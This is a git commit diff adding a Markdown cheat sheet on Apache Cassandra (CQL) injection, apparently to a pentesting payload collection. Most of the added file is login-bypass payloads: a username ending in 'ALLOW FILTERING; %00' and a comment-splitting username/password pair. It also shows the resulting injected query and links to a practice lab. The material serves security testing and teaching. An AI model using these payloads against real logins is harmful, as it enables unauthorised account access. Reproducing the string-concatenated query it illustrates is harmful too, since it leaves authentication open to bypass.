Cassandra SQL + XSS MD + PHP Type Juggling

2026-01-04 16:57:12 -08:00 · 2018-09-10 20:40:43 +02:00
parent 90f4c3634e
commit 2a080f82e6
10 changed files with 101 additions and 12 deletions
--- a/injection/Cassandra
+++ b/injection/Cassandra
@@ -0,0 +1,37 @@
+# Cassandra Injection
+
+> Apache Cassandra is a free and open-source distributed wide column store NoSQL database management system
+
+## Cassandra comment
+
+```sql
+/* Cassandra Comment */
+```
+
+## Cassandra - Login Bypass
+
+### Login Bypass 0
+
+```sql
+username: admin' ALLOW FILTERING; %00
+password: ANY
+```
+
+### Login Bypass 1
+
+```sql
+username: admin'/*
+password: */and pass>'
+```
+
+The injection would look like the following SQL query
+
+```sql
+SELECT * FROM users WHERE user = 'admin'/*' AND pass = '*/and pass>'' ALLOW FILTERING;
+```
+
+Example from EternalNoob : [https://hack2learn.pw/cassandra/login.php](https://hack2learn.pw/cassandra/login.php)
+
+## Thanks to
+
+* [Injection In Apache Cassandra – Part I - Rodolfo - EternalNoobs](https://eternalnoobs.com/injection-in-apache-cassandra-part-i/)